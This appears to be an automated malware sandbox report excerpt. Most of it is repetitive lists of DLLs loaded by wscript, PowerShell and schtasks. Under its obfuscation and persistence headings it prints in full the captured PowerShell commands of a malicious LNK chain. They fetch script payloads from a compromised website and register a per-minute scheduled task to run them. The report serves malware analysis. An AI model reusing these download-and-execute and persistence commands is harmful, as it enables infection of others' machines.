Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
      Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
      Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
      Source: G9eWTvswoH.lnk | LNK file: ..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: C:\Windows\System32\wscript.exe | Automated click: OK
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

      Data Obfuscation

      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B872314 pushad ; iretd 4_2_00007FFD9B87232D

      Persistence and Installation Behavior

      Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;

      Boot Survival

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
